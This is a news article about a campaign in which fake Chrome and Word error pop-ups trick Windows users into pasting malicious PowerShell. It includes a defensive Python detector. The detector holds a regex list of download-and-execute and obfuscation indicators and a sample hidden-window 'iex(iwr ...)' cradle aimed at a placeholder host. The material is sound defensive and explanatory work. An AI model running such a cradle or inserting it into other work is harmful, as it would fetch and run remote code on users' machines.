Is Google Chrome asking you to copy-paste code? Be careful, it could be a money-stealing scam
An online security firm has documented a new social-engineering technique that is already being used to deliver money-stealing malware. The good news is that the scam has a tell that makes it easy to identify and avoid. Let's find out how.
Yet another cybersecurity issue has been discovered, this time aimed at Windows users through fake Google Chrome and Microsoft error messages. Proofpoint, an online security firm, has flagged an ongoing campaign that mimics official-looking pop-up windows and instructs the user to run a script. A user who follows those instructions ends up installing malware that can steal credentials and money. Proofpoint researchers describe it as an increasingly popular technique that relies on unusual social engineering to get the victim to run PowerShell and install malware themselves.
The company says it has “observed an increase in a technique that leverages unique social engineering tactics that instruct users to copy and paste a malicious PowerShell script in order to infect their computer with malware.”
What does this malware scam look like?
Whether the campaign starts via malspam or via a script injected into a web page the victim visits, the technique is the same, experts warned. Users are shown a pop-up textbox stating that an error occurred while attempting to open a document or webpage, together with instructions to copy a block of text and paste it into a PowerShell terminal, or into the Windows Run dialog box (Win+R), which ultimately runs the script via PowerShell.
Research also shows that cybercriminals are using this technique to deliver a variety of malware. Besides the fake Google Chrome error pop-ups, the lure can also arrive by email. The emails, which usually look work- or corporate-related, carry an HTML (Hypertext Markup Language) attachment that, when opened, mimics a Microsoft Word document and displays one of a variety of error messages.
In both cases, users are prompted to open PowerShell and paste the malicious code, in a deceptive campaign that, according to Proofpoint, is widespread. Proofpoint observed TA571 using this technique in early March 2024 and the ClearFake cluster in early April, and both clusters again in early June.
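The paste-into-Run step described above leaves a trail in endpoint telemetry: a PowerShell process whose parent is explorer.exe (the Run dialog launches everything under Explorer) and whose command line carries a hidden-window switch, an encoded command, or a download-and-execute cradle. The following detection logic is an added example written for this article, not Proofpoint's code. The event field names (image, parent_image, command_line), the indicator list and the sample events are all constructed here; adapt the field names to your Sysmon or EDR process-creation telemetry.

```python
"""
Flag process-creation events that look like a user pasting a malicious
PowerShell one-liner into the Windows Run dialog or a PowerShell console.
"""
import re
from typing import Optional

# Indicators commonly seen in pasted "fix it" one-liners: hidden window,
# encoded payload, or download-and-execute. Assumed starter list; tune locally.
SUSPICIOUS_ARGS = [
    r"-w(?:indowstyle)?\s+hidden",
    r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    r"\biex\b|invoke-expression",
    r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
    r"\bmshta\b|\bbitsadmin\b|\bcertutil\b",
]
SUSPICIOUS_RE = re.compile("|".join(SUSPICIOUS_ARGS), re.IGNORECASE)

# Only PowerShell hosts are in scope; explorer.exe as parent means the process
# was started interactively, e.g. from the Win+R Run dialog.
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")
INTERACTIVE_PARENTS = ("explorer.exe",)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return a reason string if the event matches the pattern, else None."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "")
    if image not in POWERSHELL_IMAGES:
        return None
    hits = SUSPICIOUS_RE.findall(cmd)   # non-capturing groups: full matches
    if not hits:
        return None
    if parent in INTERACTIVE_PARENTS:
        return f"PowerShell launched via Run dialog/explorer with: {hits}"
    return f"PowerShell with suspicious arguments: {hits}"


def scan(events):
    """Return (command_line, reason) pairs for every flagged event."""
    flagged = []
    for e in events:
        reason = classify(e)
        if reason:
            flagged.append((e["command_line"], reason))
    return flagged


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Benign: admin opens PowerShell from the Start menu, no arguments.
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe"},
    # Pasted into Win+R: hidden window plus download-and-execute cradle.
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -w hidden -c iex(iwr 'http://example.invalid/fix.ps1')"},
    # Encoded command from a service host: suspicious, but not the Run-dialog pattern.
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    # Unrelated process: ignored.
    {"image": r"C:\Windows\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe todo.txt"},
]

if __name__ == "__main__":
    for cmd, reason in scan(SAMPLE_EVENTS):
        print(f"{reason}\n    {cmd}")
```

The same regular expression can be run over the values stored under the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU key during incident response, since Windows records what a user typed or pasted into the Run dialog there; that gives you the pasted one-liner even when process telemetry was not being collected at the time.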
How to avoid this malware scam?
Although the consequences can be severe, the scam is easy to spot. Its hallmark is a pop-up claiming that an error occurred while trying to open a document or webpage, followed by instructions to copy some text and paste it into the PowerShell terminal or the Windows Run dialog box. No legitimate error message from Windows, Chrome or Word asks you to do that: if you see one, close the page or email without running anything.
On the surface, one might assume that this would be easy to identify and ignore as unusual. But Proofpoint warns that “although the attack chain requires significant user interaction to succeed, social engineering can so cleverly present someone with both the real problem and the solution simultaneously that it can lead the user to take action without considering the risk.”
Most of the malware installed this way is built for credential theft or for fraudulent cryptocurrency transactions, in which transfers of the user's own crypto made from the infected device are diverted to the attackers.
The fake error messages work because they pose as official notifications from the operating system or application and present both the problem and its apparent fix in one place, so the viewer acts immediately without considering the risk.